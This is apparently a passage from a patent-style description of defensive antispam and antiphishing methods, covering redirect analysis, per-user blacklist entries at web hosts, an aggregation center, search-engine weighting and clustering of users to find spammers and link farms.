A redirect is important because unlike clicking on a link, it does not involve the browser user's active intervention. This is sometimes used by a spammer, to take the visitor away from the URL that ends at WH, to the spammer's actual website. Or perhaps to another website with another redirect et cetera; ultimately ending up at the true spammer's website. We stress that there are important real uses for redirects. But the presence of a redirect in any of a user's pages could set a Boolean style. Or the style might be an integer that counts up the number of the user's pages that have redirects. Or it could be a fraction that normalizes this number with respect to the total number of user's pages. An important special case of the latter is where there is only one page for the user, and it redirects. This might be considered a special and potentially suspicious style.
Other redirect styles are possible. For example, does a redirect leave wh.com? If so, this might be considered more suspicious than a redirect that stays within the base domain. Thus, a Boolean style might be set here.
Suppose a redirect stays within wh.com. If it goes to a different user, then this might set a Boolean style, as contrasted to a redirect that stays within the user's files. Why might this be significant? There are at least two possible reasons. Firstly, the spammer might set up a main account, that has various pages (and perhaps code as well) selling some item. Then, she might set up other accounts, which redirect to the main account. The URLs of the former accounts are promulgated in spam. So if these are blacklisted, her main account might not be. The blacklisting might involve either a simple use of the domain+path, or a resolving down to the base domain + user name, as described in Section 6. And there is less effort for her compared to setting up the full pages on all her accounts.
Secondly, imagine that WH writes labels into the URLs, describing whether a user has a free, paid or verified account. The spammer might set up a paid account, with address http://wh.com/paid/Nick. Then, she sets up several free accounts, e.g. http://wh.com/free/Sue (etc), where these redirect to Nick. She does this for the reason in the previous paragraph. But here also, she wants the "paid" in the URL to be seen by the end user, as more authoritative than "free". She puts the free URLs into spam. Here, such a link might be <a href = "http://wh.com/free/Sue"> Cheap Meds </a>
The anchor text ("Cheap Meds") is visible when the recipient views the spam in a program like a browser that can show HTML. Now when she moves her mouse over the link, the bottom of the browser will show the URL. But some users ignore this. If she clicks on the link, it takes her to that URL. An immediate redirect happens, to http://wh.com/paid/Nick. This URL appears in the address bar at the top of the browser, and is far more prominent than a link transiently displayed at the bottom. So the recipient sees a page in a paid account.
If a redirect leads to another redirect et cetera, then this could set a Boolean style. Or an integer style that counts the number of steps in this chain.
Or if a redirect chain has one or more of the destinations being in a blacklist, then a Boolean style could be set. Or an integer style that counts the number of such destinations in the chain.
The previous three paragraphs referred to a single redirect in one of the user's pages. Other related styles could be defined, that counted up these events, to the extent that they exist, across all the user's pages.
The styles could also be associated with the destination domains. Giving extra information to help classify those domains.
The above styles are associated with the user. But they could be "summed up" across all of WH's users, and the results associated with WH. In this way, metrics could be obtained for each web hosting site. Perhaps to quantify the amount of suspicious activity across the different sites. This might be used as part of a quantitative reputation of each site.
There might be other redirect styles specific to a site. Like, does the site let a user write a redirect? If so, can she redirect outside the site? If so, does the site filter these redirects against a blacklist? So that an attempt by a user to write a page with such a redirect is rejected, and the page never appears on the Web. Does the site also filter redirects against a whitelist?
If the user can redirect, can she just have a redirect page?
If the user can redirect, does it fail? Perhaps because the destination was taken offline. Maybe it was at another hosting site, and that site received complaints from others, sufficient for it to remove that page. Or the destination was a spammer domain, and its upstream network provider terminated its access for a similar reason. The setting of this style might be taken as a possible negative about the user. (Though by itself, it is not conclusive.)
An elaboration on these styles is if they are restricted to subsets of the users. For example, does the site permit redirects, but only from paid or verified users? These styles might also be considered policies of the site. Hence, sites can be compared for the strictness of their policies. Plus, of course, if they adhere to these. This itself can be a useful style.
If the user can redirect, is she able to write the destination as the output of a scripting routine, which might be computed by the browser? If she is a spammer, she might do this, in order to hide the destination from a simple filtering that just looks for a fixed string. In "1698", we discussed this in the context of an electronic message with what we called a "dynamic hyperlink" in the message body. Here, we have a web page instead of a message. And we do not have a hyperlink, since it is a key characteristic of a redirect that no special browser user action is done to invoke it, unlike clicking a hyperlink. But fundamentally, the idea is the same. The spammer wants to tell the browser to go to another location on the network. And she wants to avoid a blacklist method that looks for a static address of that location and compares it against the blacklist. Here, potentially, this blacklisting might be done by the hosting site or by a browser that has this ability. So she might use the same idea as "1698", of hiding the destination in a routine.
It might be that technically this is not possible to do with redirects, given the languages in which she might write routines that can be put into a page, and which can be run by a browser. If so, then the previous paragraph is moot. But if it is technically possible, then it is useful to know if the site forbids the writing of such a routine. If so, does the site just have it as a policy, and expect its users to adhere? Or does it have a parsing filter, that checks a user's submission of a web page for this dynamic addressing? Running this filter could be a more positive factor, when assessing the site. Note that the filter does not need to actually compute the destination from such a routine. It could merely check for the presence of the appropriate command in the page that invokes the routine. A simple objective test.
But if the site allows dynamic addressing of redirects, then does it check these against a blacklist or whitelist? Here, the site can use the ideas in "1698" to run master-slave threads that call the routine, in order to find the address. The slave does the computation, but the master will terminate the slave if it does not end within some given time. This avoids the possibility that a spammer submits a page with a routine that deliberately takes a long (or infinite) time. She is trying to stop the site from scrutinizing the dynamic addressing. So that even though that particular account of hers might be deleted because of this, the long run time endured by the site to find this out is meant to deter the site from doing this as a general practice, letting her make another account with dynamic addressing. Our method in "1698" avoids this trap.
An external entity like an ISP, or even a browser, can also apply this anti-dynamic addressing method against a redirect, if the routine exists in code that is downloaded to a browser. These styles or policies can also be used as additional criteria for determining if a given web hosting site will be admitted to the set of good sites, H, or kept in it.
6. Adding User to a Blacklist Entry
Suppose we, the ISP, now have found from WH the names of various users. Then, the canonical steps of the Antispam Provisionals can be modified. When a BME has a list of domains, D, from links in its messages, then D might also include the users. So, from the examples above, a BME might have a domain entry "wh.com/Zoltan", and another BME might have a domain entry "wh.com/Mary". This notation is arbitrary, but we choose it as one example, and is meant to be obvious. The use of the forward slash, "/", is optional but conforms to Standard URL notation.
Hence, if WH is in the set H of major web hosts, then wh.com is not put into a blacklist. But we might instead put wh.com/Zoltan into the blacklist.
By this simple extension of the blacklist idea, we can use our analysis methods developed in the Antispam and Antiphishing Provisionals that were applied to the metadata space of domains. In those methods, a given entry in the earlier idea of a blacklist was an atomic entity, inasmuch as it was treated as a datum with no internal structure. Hence, the extension of a blacklist in this Invention lets those methods be used unchanged, or with trivial changes.
For example, we can see if templating occurs. Where when we reduce a message to its canonical form and make hashes, we find that it is an instance of an existing BME. But the current message has a base domain from a link that is not in the BME's list of domains. We call it templating because the spammer is using a base version of the message as a template, and inserting different domains into the links. Now, we can also look to see if the spammer is using different user accounts at a given web host, or maybe different accounts at different web hosts, based on messages received by us. Plus, we can also spider the various links, and apply our canonical steps to the web pages pointed to, out to some n-ball in link space.
This lets us (the ISP) be a powerful aid to WH, by pointing out associations between ostensibly different users. Or with users at other web hosts, or with other domains.
Given this extension of a blacklist entry, antispam methods not described in our Antispam or Antiphishing Provisionals could also be used.
7. Aggregation Center
In our Antiphishing Provisionals we defined and used the idea of an Aggregation Center (Agg) that would be a central point for banks and other large companies to send their Partner Lists and other associated data to. The Agg then downloads these to users' browsers, which have a toolbar or extension that can apply this information to web pages or messages in the browser.
The Agg can also be used in this Invention. Earlier, we described how an ISP could decide the composition of a list, H, of major web hosts. It would then obtain f() from each web host. An alternative is for the Agg to do these tasks, and then furnish this to its customer ISPs. (Or, an antispam vendor might furnish the equivalent software and data to ISPs.) The Agg is well suited to maintain H and its associated information. For example, complaints by ISPs about users in a given company in H might be amassed by the Agg and then forwarded to that company. This could be useful from the company's vantage. Because instead of dealing with many ISPs, and perhaps wondering if some might have been subverted and are then sending it spurious complaints, it delegates to the Agg the problem of filtering the complaints.
The maintenance could include deciding what web hosts will be in H, and whether to keep a given host in H. For the latter host, suppose it is WH. The situation might arise if WH takes too long to respond to complaints from the Agg about its users. What "too long" means might be defined by the Agg. So that a web host which is put into H might agree to respond within this time, as part of the condition for it to belong in H. It should be appreciated that there is value for WH to be in a widely used H.
The Agg might compute various metrics about each host in H. Like the number of complaints it gets from its ISPs about each host's users. Or the number of each host's users that are complained out. Or the average time between the Agg complaining to a host about one of its users and that user being taken offline. Also, if a host furnishes status information about its users, like whether they are free, paid or verified, then the Agg can total up complaints for users in each category. So that, for example, if WH has many verified users that are complained about, it suggests that WH's verification methods might need improvement.
From the above, it can be seen that the Agg can act as a known, trusted intermediary, standing between the web hosts of H and ISPs and other message providers.
Earlier, we said that H is expected to be of small size. In part, because if each ISP has to maintain its own, a small H is less effort. However, if Agg maintains H, then it may be cost effective for it to have a larger H, since it can essentially amortize this effort over a base of many ISPs.
The Agg can offer a service to the web hosts in H. It can certify that a given web host is in H. So that the Agg is attesting that members of H perhaps follow certain good practises, where these might be defined by the Agg, as a prerequisite for membership (and continued membership) in H. So it might offer WH an image that WH could show on some of these pages, where this image is a "seal" attesting to validation by the Agg. The seal might also be clickable, going to Agg's website, where data is then shown about WH's qualifications. However, while this could be done, it is well known that seals have disadvantages. They can be copied by spammers. And if a real seal is clickable, so too might the fake seal. Where the fake either goes to another spam page, or even to the Agg's website. In either case, the spammer hopes that most users will not bother to click the fake seal. However, if a browser has the extension described in ["2245", "2458", "2528"], then the Agg can offer a stronger measure. The extension could validate that a given web site which the browser is at, is actually in H. Plus, if it finds links to the validation pages at Agg, at pages not in H, then the browser could indicate this to its user, perhaps by a visual cue that says the page is a fake.
The Agg can also offer a service to users at web hosts. By various means, it might offer some validation of a user's identity or reputation, possibly in conjunction with a validation of the user's web pages. Imagine such a user, Jane, at WH, with her web pages beginning with http://wh.com/jane/. In those pages, Jane could have a tag that points to the Agg. So that a visitor can ask the Agg what it vouches for her. Plus, in her URLs, there might be the equivalent information, encoded in some fashion. In general, WH controls the format of URLs pointing to its pages, and it could permit this encoding. Hence, even if WH were not to offer the information about Jane described in Section 3, this encoding would let her offer others some assurance about her and her web pages.
There are now 3 states for a user - unvalid, valid and invalid. The unvalid is the default, for a user that has not been validated, and who does not have "bad" pages which might cause it to be invalid, in the Agg's assessment.
The validation of a user need not be confined to users with pages in H. Though the Agg might refuse to validate any users on a website, if that site fails to meet standards imposed by the Agg. This acts against a minor web hosting site being conducive to spammers. Where a spammer might deliberately want to set up several "users" with benign pages, and get these validated by the Agg. To try to enhance the overall reputation of the site, and then proceed to issue spam linking to other users at the site. As discussed above with the validation of an entire website in H, when validating one user's pages, the Agg might offer the user a validation seal to put in her pages. This might (or perhaps should) be clickable, reaching to the Agg. Whereupon, there might be an Agg page with information about the user. Plus, if the browser has the above extension, then it might validate the user's pages in a manner that is external to the pages.
For both a website and a user, there could be different levels of validation offered by the Agg. There might be a strictly algorithmic validation. Then there could be a higher level of validation, which performs the previous validation and also involves some manual steps on the part of the Agg's employees and possibly also of the website's employees or of the user. The Agg could impose a higher fee for the latter validation, compared to the former.
A user might have accounts on several hosting sites, and the Agg could offer to validate these, all under the rubric of the same user. The Agg could have some steps to verify that the same person controls these accounts.
Above, when we described validating a user, this could be either a person or a group of persons or an organization.
The Agg validating a user or website might be useful to either. For example, a validated user might be able to obtain a higher commission for clickable ads that are placed in her pages. Perhaps on the probability that her pages are more likely to be credible. Or messages linking to her pages might be less likely to be treated as spam by various antispam methods that can identify that she is validated.
If the Agg were to invalidate a user or website, then this might be for two reasons. One is if the certification is paid for by the user or website, and the period for which this is valid has expired, and no payment has been received for another period. Another reason could be that through its analysis of the pages, or from external input, the Agg finds that the user or website should not be validated. The first reason might be considered more benign than the second.
If it is a user that is now invalid, the Agg might inform her website/s.
If the invalidation is for the second reason and for a user, the Agg might search its data for other users with pages canonically identical to the now invalid pages, and possibly invalidate those users, and inform their websites. Plus, the Agg might inform various ISPs and message providers that are its customers, updating their blacklists with this new entry for the invalid user.
Care has to be taken here. If a user is invalidated for the second reason, and because certain of her pages are considered invalid, then the search for other users with canonically identical pages might only be done for the invalid pages. Since the user might deliberately have benign pages.
Along these lines, if the Agg validates a user that was earlier invalid, then it might inform its ISP customers, suggesting that they remove the user from their blacklists.
8. Blog Sites
So far, we have mostly considered the case where a link goes from an electronic message to a page at WH. It is also possible that the link is in a web page, where, in- general, this is at another domain, R. So R could be another web hosting site. R can also do the above analysis, in order to protect visitors to its pages from spam. It might already have a conventional blacklist consisting strictly of domains, which it applies to its pages. This can be extended as above to now include entries at web hosts, with user information. An important case is where R is a blog site. These have been facing increasing problems with manual and robot attacks that write "messages" which are spam, with links to spammers' pages elsewhere on the web.
9. Search Engine
A search engine could also benefit from the extra information made available by a web hosting site. Suppose the engine can access the information from the Web Service of WH. Then for a given web page, the engine knows if the author is a free, paid or verified customer of WH. And possibly the number of complaints made against the page. And how long the account has existed. Each engine has its own methods of ranking pages. This new information might be used to refine the rankings. For example, a page by a paid user might have a slightly higher weighting than a page by a free user, other factors being equal. Or, if WH used labels in its URLs, as suggested above, then the engine could use these.
Consider the user Zoltan with webpages at WH, and imagine that these are prefixed by the URL http://wh.com/Zoltan/. Here, we have depicted WH as not writing extra information in the URL as discussed above. But our method here also applies if that is done.
In general, Zoltan has a hierarchy of pages, in various directories and subdirectories of the above URL. The engine spiders these pages and wants to compute weightings. Suppose a particular directory, cheapPills/, and its pages, are linked to by various pages outside wh.com. Then, the engine might in turn look at the links to those pages and by various computations, use the data to derive a weight for that directory or its pages. Thus far, this might be what the engine normally does.
Now suppose Zoltan has another directory, at the same level as cheapPills, but called gamble/. In turn, the engine could use its normal methods to weight this. But suppose the engine also knows, or is informed by the Agg, say, that gamble/ is linked to by spam. Hence the engine might lower the weight of gamble/. But, and this is the important point, now that it knows that gamble/ and cheapPills/ are associated with the same user, it could make a decision to also lower the weight of the latter, and any other directories of Zoltan's that are not contained in gamble/.
Currently, when the engine analyzes the pages of WH, some might be by users who have nothing to do with spam, and some are by spammers. Our method lets it treat these differently. Now, the above example was made deliberately simple. The Zoltan parent directory had two subdirectories. But in general, outside this Invention, the engine might not know of the concept of a user and which pages belong to a user, at a typical web hosting site. The engine uses the general URL notation, across all types of web sites. However, if it can find this mapping, f(URL) --> user, for a major web hosting site, whether from a Web Service, or from the engine's own coded logic, that was perhaps derived from manual scrutiny of the web site, then it can refine its weighting of the site's pages. This is an example of using data from different Electronic Communication Modalities (ECMs) ["0046"] like email or SMS.
Likewise, if the engine finds that Zoltan is a new user, less than 60 days, say, then it can lower the weights on his files.
Consider also a user at WH who is not a spammer. Most users have a finite set of interests, as seen in their pages. The engine wants to make its search results more relevant to its users. This is a very hard problem. At a major website like WH, the users span all kinds of interests. But if the engine can associate a set of pages with the WH user Laura, say, then it might be able to refine its classification of those pages. From word extraction from a page, the engine tries programmatically to have some idea what the page is about. But human languages have ambiguities. Imagine that Laura has a subset of pages that are about one subject. And she has other pages that are somewhat ambiguous. In a stochastic sense, the engine might associate the second set with the subject of the first set.
Another way of considering this task is as follows. A search engine often wants metadata about a web page, because that data can guide its composing of results. The problem is that it is impractical for the engine to generate much, if any, of this manually. (That is, by the employees of the search engine company.) Our method lets metadata come from analysis of other pages that are in the neighborhood of a page, where the neighborhood is defined by a user.
The engine can also take this to a higher level. Across the users at WH, and across users at other websites, the engine can also search for similarities between users with a same interest. Possibly the engine is already doing this, but only by comparing between pages, or between domains. Our method gives an intermediate level of grouping of pages that may prove to be useful.
In the above, it might be asked, why might Zoltan have a directory that his spam points to, and a directory that other pages link to? Perhaps because he may have several modes of income. One is from sending spam that points to a directory. Another might be by artificially boosting the search rankings of the other directory. So that if a user of the search engine makes a particular query, then Zoltan's latter directory (or pages therein) would appear in the free results.
This "Search Engine Optimization" might involve techniques disapproved of by the engine. Especially if Zoltan is part of a link farm that tries to boost the rankings of pages that it heavily links to. Search engines already have various means of trying to find link farms. In this Invention, by applying the concept of a user and the pages owned by the user, at a web hosting site, we offer another means of finding a farm.
Another example that also illustrates this is as follows. Zoltan has a directory, gamble/, linked to from spam. But now his other directory, cheapPills/, has links to directories at other websites. It is functioning as a source of links, within a link farm. The search engine finds out, as above, about the spam links to gamble/. Then, because it has the knowledge of Zoltan as a user, it could use this as a heuristic to be applied against the weightings of cheapPills/ and its files, as a possible member of a link farm. Plus, by following the outgoing links from cheapPills, it can try to trace out other members of the link farm.
Of course, if Zoltan has a directory linked to by spam, another directory with outgoing links, and another directory that is linked to from outside, where the latter 2 directories are possibly part of a link farm, then the steps described above can also be applied here. Ditto if the directories are not "cleanly" separate, but are admixtures of those cases.
We have used the concept of a user or owner of web pages and shown how it can be useful to a search engine. But the analysis can be taken further. A link farm, that is distributed across several websites, can be considered to be a group of (undesirable) users. To the extent that a link farm has members on a web hosting site, the above showed how it can be searched for, using another ECM space of electronic messaging. In addition, the space of users browsing on the web can also be used.
Imagine a toolbar or special program that is distributed to many users. It records which websites a browser visits. Periodically, this data is uploaded to the organization ("Phi") that distributed the program. For privacy considerations, imagine that Phi removes all personally identifying aspects in the data. Phi is interested in the aggregate nature of the data, which correlates websites in a manner that might not be discernible from a static view of pages and links. Conceptually, Phi is looking for a mapping f({set of URLs}) --> spammer, where the latter can be considered to be one bad "user". This might not necessarily be a link farm.
The correlation between a browser visiting one web site and then another might arise because of spam sent to that user, with links to both sites. Earlier, we discussed an ISP finding such messages, possibly using our Antispam Provisionals. But a given ISP or a group of ISPs might not be doing this. If the spammer sends messages to users at those ISPs, and not to others, then the implementers of this Invention have no access to that data. The use of Phi's browser data is an attempt to get around this lack of access.
An initial group of associated URLs can be investigated using our BME method of "0046". The URLs and pages linked to or from these, or some pages in the same domain as those URLs, might be reduced to BMEs. Then these are compared to see if any are the same or similar across different domains. The sameness or similarity could arise if the same person or group of persons is behind those addresses, and is using boilerplate phrasing on some pages. Here, if the URL is to a web hosting site, then the methods of this Invention can be applied to those pages at the site that are from the same user.
We stress that given the initial group of associated URLs, the steps in the previous paragraph can be performed computationally, with little or no manual intervention. Except possibly at the end, to deal with a set of URLs that is diagnosed to be a group. The function of the group need not necessarily be spammers or a link farm. But being able to find such groups is useful in classifying the entire set of associated pages. Akin to our clustering methods of "1745".
Even without a toolbar, the engine can act, if it finds out that some of Zoltan's pages are spam. By doing a canonical reduction of most or all of Zoltan's pages, using
"0046", the engine can see if the non-spam pages are canonically the same (or similar to) pages at other domains. This uses the global scope of the engine's spidering, and assumes that when it records the spidered pages, it does the canonical reduction. In part, to permit such a comparison with new pages. More generally, suppose some of Zoltan's pages are found to be "bad", by any means. (Perhaps they are pointed to by spam, as discussed earlier.) Then the method of the previous paragraph can be applied to the pages. While it is clear why the engine should look for similar bad pages, looking for similar good pages may also reveal associations between domains and pages. These actions force Zoltan to expend more effort at customizing his pages on different websites, or risk them being detected and blacklisted. Increasing the spammer's effort is desirable to both an ISP and a search engine.
10. Clusters
Here, we offer an instantiation of some of the ideas in the previous section, by showing how our cluster methods of "1745" can be extended. We draw attention to the figures in "1745", which gave examples of clusters in various metadata spaces ("metaspaces") - domain, style, hash, user and relay. (Other metaspaces are possible.) One change when we have a domain cluster, as described in Section 6, is that the "domains" might also include an extension that indicates a user at a given web hosting domain. There, we implicitly mixed the domain and user metaspaces, by bringing in the user information as a modified domain name.
Going beyond this, consider a domain cluster, where we do not apply the notation of Section 6. Suppose there are two nodes in it, connected by an edge, e.g.
apedog.com catred.com 5
From "1745", if the underlying space is the set of BMEs, then the 5 on the edge means that there are at least 5 BMEs containing both domains. However, if the cluster was made from an underlying space of users, then the above could be defined as meaning that 5 users have both domains. Here, "have" could mean that we take a user at WH, find its pages and extract domains from links in them.
We might require that at least one page in the user's set have both domains. Or we could relax this by merely requiring that the domains be from different pages of that user. Suppose temporarily that we are looking at data from just one user. By finding the clusters based on whether the connected domains must be from the same page or not, it lets us find the amount of disjointedness between sets of pages, all for the same user. If such a disjointedness exists, then it could suggest a splitting of the user's interests. This could be checked against a language-dependent analysis of the pages' content.
An extension of this method involves possibly determining if there appear to be groupings in the user's pages, based on an analysis of the user's URLs. Does the URL notation suggest a division into directories and subdirectories? It does not have to. But recall that WH is considered to be a major web host. So it is likely to use a simple URL notation, for the benefit of its users. Given this, for a cluster of a user's pages to have two connected domains might involve parameters that indicate the separation between two pages, each with one of those domains, in the user's directory structure. Where the domains might be connected if the pages are separated by less than some metric that measures the "distance" between 2 files in a directory tree. This can also aid in the autoclassification of the directories.
If the entity (which could be the Agg) making the clusters has access to data from other web hosting sites, then the users that produce the above might be from different sites. Plus, the entity might also add user message data, where these users are recipients or senders of electronic messages, and where the messages might have clickable links, from which domains can be found. By finding clusters through the mixing of data from these ECMs, we improve our chances of finding associations, especially those that might be indicative of spam. Note that the entity does not need to have access to the full text of the electronic messages. (So it does not have to be an ISP or message provider.) A key finding in "0046" was that canonically reduced BME data could be exported from a message provider to another organization, without letting the latter have access to the original messages. The clusters are found using the BME data.
Variants on the above procedures could be done. For example, clusters might be made that do not take all the users in WH. Instead, just the free users, or just the paid users, or just the verified users might be taken as the input to finding clusters. Or we might make clusters from user accounts that have existed for less than 30 days. Likewise, we can do these steps across different web hosting sites. So we can investigate if there are any distinctive differences between these groups of users. Perhaps free users are more likely to be spammers on some web hosts?
Another variant is for clusters to be found from users confined to one web host. Then these are compared to those clusters found from other web hosts. Here, optionally, user data from message providers might or might not also be used, when finding clusters.
Suppose in the above example of two connected nodes in a domain cluster, there are five users having both these domains. Functionally, it is useful to imagine this implemented as the digit "5" in the above schematic. The investigator can pick this, in an analysis program with a graphical user interface, and bring up a list of the users with those domains. This list is more than just a simple list of names. Picking a name lets her then look in the other metaspaces for that user, to compare the associated properties for the users in those spaces, to see if they have similar behavior. This can help her discern if possibly the users are acting in concert, or perhaps are even the same real person, who has assumed several user identities to WH. The power of these investigations is enhanced if the user data comes from different web hosts. (In this discussion of the domain metaspace, we used the instance of the Internet and the World Wide Web. Where the domains arise from clickable links in web pages or electronic messages. This clickable property is the key attribute of the Web, as contrasted to the Internet. But our remarks apply in any other type of network that has the equivalent of clickable links in a message or document. For example, there might be a telephone network, and phone messages with links being clickable phone numbers. If so, then these phone numbers are the analog of the domains.)
Imagine we are looking at the hash metaspace. In a hash cluster, derived from an underlying space of users, we might find two nodes connected like this -
08AD304... BC379008AF...
7
Here, each hash is represented as a hexadecimal string. The 7' means that there are 7 users, each with both hashes. When we say a user has both hashes, this could be taken to mean that the user's pages have been canonically reduced "0046", and a set of hashes made for each page. The hashes might be required to be from the same page. Or, more generally, from different pages of the same user. As with domain clusters, the users might be from one web hosting site, or from several. And data might optionally be introduced from messages sent or received by message providers. Also, hash clusters might be made with users restricted to the free, paid or verified categories.
Now consider the user metaspace. There are several ways to make clusters. One approach is to build a directed graph, containing directed edges like -
Dinesh > Sandip
This means that one of Dinesh' s pages has an outgoing link to one of Sandip's pages. Incoming links could also be used. In HTML, these might be when a page is loading an image from a URL that points to another user's page or asset. Also, the infonnation in redirects might also be used, if these go from one user to another. This method looks for explicit connections and can help show users that are prominent sources (many outgoing edges) or sinks (many incoming edges). Hence, these might be put under further scrutiny.
Another method is to derive user clusters from an underlying space of BMEs. We might find two nodes connected like this -
Janet - Zoltan
Here, Janet and Zoltan are assumed to be users at WH. If they are from different websites, then there might be the notation -
somewhere.com/Janet wh.com/Zoltan
8
In either instance, the 8 means that there are 8 BMEs in present in both Janet and Zoltan's sets of BMEs, where these sets are derived by canonical reduction of their web pages. Clicking on the 8 brings up a list of the common BMEs, from which the investigator can find more details.
If WH makes available extra data about the users, that was discussed in Section 3, then more analysis options emerge. For example, the building of user clusters might be also have some graphical display of when the user accounts were made. Or the users might be restricted to those made in some time interval. This searches for temporal correlations. Since if a spammer makes several accounts, she is likely to do so over a short time interval. If she increases this interval, then it takes longer for her to set up to issue spam pointing to these users. We look for characteristics that are inherently hard for her to obscure.
Another example could be the making of clusters from users with less than some number of pages. And then comparing these clusters to those from users with pages greater than or equal to that number.
Note that the above description of a user cluster gives a higher level view of pages within a web hosting site, or across such sites, since a user node in the cluster represents all the pages owned by that user. In itself, this summary view, and the decomposition of the site's pages into clusters may be useful to the investigator (or the site) in understanding the interest structure of the users.
By using cross-ECM data, we can enhance the making of user clusters. Suppose we can now access BMEs made from electronic messages. In each BME, the user information might be about the case where the user is the recipient or where the user is the sender, where, in general, these are different from the users who have pages at the hosting sites. Here, when we say "user cluster", we mean the latter users. It is now possible that in such a cluster, two users are connected because, e.g. message A has a link to an URL of a file owned by Janet, while message B has a link to an URL of a file owned by Zoltan. Where both messages produce the same BME. This is possible because in the canonical steps of "0046", links are removed from the message, before hashing is done. Hence we can use both the web pages and messages that link to those pages to correlate users.
The above is based on an exact match of BMEs from Janet and Zoltan. Following "0046", we can look for similar matches. Where 'similar' can be defined as two BMEs having m hashes the same, with m < n = number of hashes in a BME, and the investigator can choose a given m value. Given that Janet and Zoltan each have several BMEs, then some of Janet's BMEs might be similar to some of Zoltan's. Hence, a metric might be defined that measures the average similarity between each user's BMEs. It could be used to look for users that might be related in some manner. Perhaps the users are part of a link farm, where each user has some pages with boilerplate common across this set of users?
The second approach complements the first. It can be used to find associations between users that have no explicit connection between them.
We could also combine both approaches, making clusters with directed and non- directed edges, to further expand the scope of searching for associations. This can be useful in looking for link farms, for example. Where the spammer sets up several user accounts, with same or similar pages, because this is less effort. And these pages then point to certain pages, possibly external to those hosts. The use of BMEs lets us search for the user accounts, which probably have no direct links between them. While the pointing to common external pages reinforces the chance of a link farm. Because one could imagine non-spammer users that have very different pages, and which link to a common, favorite website. But if the linking pages are canonically same or similar, it suggests otherwise.
Given the making of domain and user clusters, these can be used if the Agg finds a user to be invalid. Then, the domains or other users that it links to in the clusters can be scrutinized, to see if these might be invalid. Care has to be taken, because the spammer might deliberately put in links to innocent sites, as a countermeasure. Also, the Agg can look at domains and users that link to the invalidated user. This may be more suspect than outgoing links from the latter. The countermeasure done by the spammer for outgoing links could typically be to well known websites. But for incoming links, who knows about that account? Often, it would be an obscure account.
From email, we derived a metaspace of relay information, where the relays are the purported computers that forwarded an email to its destination. For the case of websites, there might be no simple analog to a relay metaspace.
It is also possible to make style clusters, along the lines of ς1745". But it should also be realized that, implicitly, style information could (and probably should) be used in several of the above suggested analyses. For example, when making a user cluster, the styles of users within the same cluster could be compared. Styles that occur frequently amongst many users in a cluster might be used to characterize the entire cluster. Or, styles that occur only in a subset of the cluster might suggest a natural subdivision of the cluster. Also, if styles are found for entire clusters, then this gives a means of comparing clusters, and a basis for classifying clusters.
11. Antiphishing
Thus far, we have considered the case of general spam. But there is a specific type of spam, phishing, which is important enough to discuss here. For general purpose spam, typically if enough complaints are reported to the web host, then it will terminate that user's account, as being in violation of the Terms of Service, and all the user's pages will be removed.
But if the pages and the messages that point to these pages are phishing, then other alternatives might be considered. Especially if an Agg sits between the web host ("WH") and the ISPs and other message providers.
First, we should say that our antiphishing methods of "2245" and "2458" suffice to detect if a message is phishing, where it claims to be from Bank0.com, say, and where the phishing link in the message is to http://wh.com/mike/. This assumes that the Agg has BankO as a customer, and hence has the bank's Partner List. Then, since in general wh.com is not on that PL, we have objectively found phishing. This works because our antiphishing method uses a PL and not a blacklist. Now consider what could happen when the Agg gets notified of this phishing message from a browser. Unlike general spam, where it might want to accumulate enough complaints from various ISPs, before telling WH, phishing needs a faster response. Hence, the Agg might contact WH, as soon as the Agg has verified that indeed a browser has detected a phishing message with a link to, say, http://wh.com/free/Zoltan.
WH could do several things. It might immediately shut down Zoltan's pages, to prevent anyone else from being defrauded after this time. Or it might discard any requests for that page, and Zoltan's other pages (if any), but let investigators get the pages. This protects unwary visitors, while possibly letting investigators submit fake personal data that could be used to entrap the phisher. If the pages have outgoing links, these could be followed to see if they lead to the phisher.
WH could use our antispam methods of making a BME to see if any pages by its other users are canonically the same or similar to Zoltan's pages. This handles the case where Zoltan has opened several accounts at WH, and is also using those as destinations for phishing. Along these lines, the Agg might make BMEs out of Zoltan's pages, and then see if these are present at other websites in H. It might send these BMEs to those sites, and ask them to check these against their users' pages. Or for some sites, the Agg might do this task.
We also generalize the definition of the contents of a Partner List in "2245", to include the possibility that an entry might refer to a user's pages at a web host. Though given that Partner Lists are expected to be published by large companies for an antiphishing usage, this new type of entry might be rare.
12. A Specialized Search Engine
Thus far, we discussed using the Agg mostly to help ISPs and message providers, by standing between them and various major web hosts. The Agg does tasks that otherwise the ISPs and providers might have to do themselves. In essence, the Agg factors out these tasks and the expertise implied by them. In this Section, we show in a like manner how the Agg can help the web hosts, and do tasks that they might otherwise have to perform.
Consider the web host WH. When one of its users submits or changes a page, WH might wait some period of time, before making the page publicly available. During this, it could subject the page to various antispam and antiphishing analyses.
One possibility is that it might send the addresses of these pages to the Agg. Here the Agg would function in an antispam or antiphishing capacity. For example, it might use our Antispam and Antiphishing Provisionals. Especially by making BMEs of the submitted pages, and comparing these to other known BMEs. Here, in an extension of the way we made BMEs in "0046", these BMEs would also include in some manner the URLs that pointed to the pages that went into those BMEs. The Agg is well suited to do this analysis, since it could receive submitted pages from a variety of web hosts. Plus, it would have the expertise to develop and run specialized testing, that even a major web host might not have.
Of course, if the Agg does any tests, WH would expressly permit it to access those pages, while denying general access from the rest of the network.
Whether WH or the Agg does testing, to be practical, these should usually be automated. It must not be that a significant manual effort is involved. Our methods are well suited to this. To the extent that manual involvement is needed might be if a page is either objectively found to be phishing or pharming, or if a page has enough styles that strongly suggest spam or phishing.
If the Agg tests, it can be considered to act as a specialized search engine. WH sends it an URL and essentially asks, "Have you seen this before?" and "Is it spam or phishing?". Here, of course, we are referring to the page pointed to by the URL, and not the URL itself. For the first question, the Agg might answer with a count of 0 or greater. Where 0 means no canonical equivalent of the page has been seen before by the Agg. And 1 or greater means it has, and the number is the number of such pages in the BME.
If the page has been seen before, the Agg's reply might include URLs of some of those pages, which in general will be at different websites. WH might specify if it wants these other URLs to be of other domains, or of its domain, or both. It might be just interested in matching URLs in its domain, because it controls these URLs, and can decide, for example, if those URLs and the URL that was sent to the Agg, might be taken offline.
Suppose that WH submits a URL, and that page is a new BME to the Agg. It records this BME. Hence, if later other web hosts, or even WH, sends other URLs, that are found to have pages in this BME, then WH might be told by the Agg that its first URL's page has now been seen at other locations. So suppose the antispam analysis of the first page said it was inconclusive whether the page was spam or not. If later, WH is told that many copies exist, it may take this as an extra factor in re-evaluating whether the page is spam or not.
